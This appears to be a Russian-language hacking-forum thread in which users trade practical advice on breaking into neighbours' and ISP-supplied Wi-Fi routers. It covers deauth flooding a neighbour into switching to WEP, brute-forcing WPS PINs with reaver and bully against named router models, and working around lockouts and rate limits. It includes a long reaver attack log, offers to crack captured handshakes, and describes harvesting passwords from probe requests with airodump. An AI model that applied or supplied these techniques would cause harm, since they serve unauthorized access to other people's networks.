Пару слов о том, что я писал выше, вернее, о результатах) Т. к. ситуация была безысходной, продолжительный дудос соседа deauth пакетами вынудил его сменить защиту на WEP) Так что теперь у меня и доступ есть, и пин записан.
Точка TL-WR720N. Брутил wps через reaver. После примерно ~500 попыток стало происходить странное.... После "Sending M2 message" появился таймаут. Это точка зависла или система защиты такая??? Поможет ли ребут?
скорей всего слабый сигнал пошел и ошибка сбилось, сохраняйте сесию, ночью как правило сигнал и ривер лутше
Есть роутер BSSID: SAGEMCOM_ХХХХ. WPS лочится после 10 попыток, анлок только после ребута. Можно поставить в ривере задержку после 9-ти попыток? И на какое время ставить?
WARNING: Detected AP rate limiting, waiting 7205 seconds before re-checking i7 3630QM, 8 Gb RAM, Nvidia GT650M
закинь сюда свой хендшейк https://forum.antichat.ru/threads/417617/ или сюда https://forum.antichat.ru/threads/435763/ ... И не забудь сказать спасибо )))
Ростелеком начал ставить роутеры ZTE ZXHN H118N c bssid D4:76:EA... WPS включен, но при попытке сбрутить принимает первую половину кода, какой бы она ни была, а дальше отбивает все попытки подобрать вторую часть. Не выходит, даже если брутить подряд без учета контрольной цифры. Атака Pixie не срабатывает. Точка находится очень близко, сигнал отличный, адаптер TP-Link TL-WN7200ND, в бою многократно проверен, ОС Kali 2.0. Какие у кого есть мысли? Кто-нибудь сталкивался?
Для начала надо поймать пару хендшейков с таких роутеров, выложить в тему перебора паролей, если удастся сбрутить думаю там будут стоять как всегда идентичные пароли, Ростелеком в этом давно замечен. Потом будет от чего отталкиваться.
или пароли, сгенеренные по известному алгоритму, как это с дурдом.ру-шными роутерами было) zte - оно ж дырявое по самое нехочу
Похоже новую ревизию выпустили, такая серия MAC-адресов ни в гугле, ни в shodan не светится. Хендшейк пока проблематично словить - за 4 дня работы роутера ни одного коннекта. Ощущение, что там просто не знают, как поженить с ним свои смартфоны...
Вот фрагмент брута. Странно, что повторы по 45 раз... Spoiler +] p2_index set to 503 [+] Pin count advanced: 10503. Max pin attempts: 11000 [+] 95.48% complete. Elapsed time: 0d1h29m42s. [+] Estimated Remaining time: 0d1h14m33s [+] Trying pin 13414979. [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [P] E-Nonce: 6a:4c:3d:a7:7f:dc:82:cd:26:48:1a:40:33:2e:f7:e3 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] WPS Manufacturer: ZTE Corporation [P] WPS Model Name: ZXHN H118N [P] WPS Model Number: ZXHN H118N [P] Access Point Serial Number: 123456789012347 [+] Received M1 message [P] R-Nonce: c2:10:53:c9:9c:6d:35:60:0b:7d:21:e6:a5:0a:2b:41 [P] PKR: e6:a7:01:87:ad:02:1c:39:76:8d:93:24:fe:75:56:ae:60:b9:4a:40:61:84:a2:ec:58:97:25:41:9b:45:37:94:bf:92:55:bf:68:19:ab:db:8a:ff:4f:51:7d:84:a6:e6:62:b8:7d:6e:9d:85:84:d5:35:59:5a:88:42:7f:85:af:7f:93:f4:b3:4b:63:53:66:57:83:b4:0d:97:38:8e:c0:c4:04:c5:c5:ea:4a:d5:81:93:f9:62:e2:ab:58:9f:7b:47:3f:df:32:a7:db:cc:d1:6e:f4:47:84:3b:55:b6:88:9f:39:17:34:b0:b0:e2:88:7d:0f:b9:a6:a4:c3:25:5c:73:98:c4:44:0f:80:fd:43:38:04:89:3c:e1:d0:22:b8:9f:52:05:c6:c9:b7:27:71:58:45:d9:3b:ea:37:58:66:60:0f:0b:48:09:64:6b:78:50:2d:91:10:0d:71:a0:ae:80:90:79:d0:4f:e9:b7:30:8c:1b:cc:de:a8:f3:47:c1 [P] AuthKey: 0b:41:30:67:63:e8:73:b9:2f:16:bd:fb:ad:bd:ac:37:f7:5f:7b:00:53:7a:92:81:27:59:15:13:ca:df:54:56 [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [P] E-Hash1: f1:3c:1c:00:dc:08:cc:91:3e:e9:e5:14:e4:28:ea:11:94:5b:07:80:96:12:2e:74:47:0e:31:65:b6:42:39:6c [P] E-Hash2: f1:3c:1c:00:dc:08:cc:91:3e:e9:e5:14:e4:28:ea:11:94:5b:07:80:96:12:2e:74:47:0e:31:65:b6:42:39:6c [+] Received M3 message [+] Sending M4 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M5 message [+] Sending M6 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [+] Received M5 message [!] WARNING: Receive timeout occurred [+] Sending WSC NACK Ростелеком у нас взял за привычку прописывать 12-значные цифровые пароли. Это я на своей телеге его месяц брутить буду.
он не принимает первую часть кода, он неправильно завершает eapol сессию, а ривер думает, что первая половина прошла успешно. и не может подобрать вторую, так как первая неправильная тоже.
И что посоветуете? Как его поиметь? Я уже, кажется, все варианты ключей перепробовал. С задержками может поиграть? Bully его вообще не берет, крутит один и тот же пин бесконечно...
Контрольный проход по взломанным точкам подтверждает, что адаптер работает как надо. Открылись другие подробности - Airodump обнаружил версию WPS 1.0 PBC, то бишь запуск WPS с кнопки. Может потому атака reaver безуспешна?
При продолжительной работе airodump-а случайно обнаружил, что, порой, в поле "Probe" проскакивает заветный пароль! Похоже, что кто-то забивает его качестве названия своего устройства. Уже три таких попалось... Получается, что просто запускаешь airodump и слушаешь эфир. Потом внимательно изучаешь ассоциацию клиентов и AP и пробуешь пароль - он обычно выделяется на фоне просто названий AP и устройств.
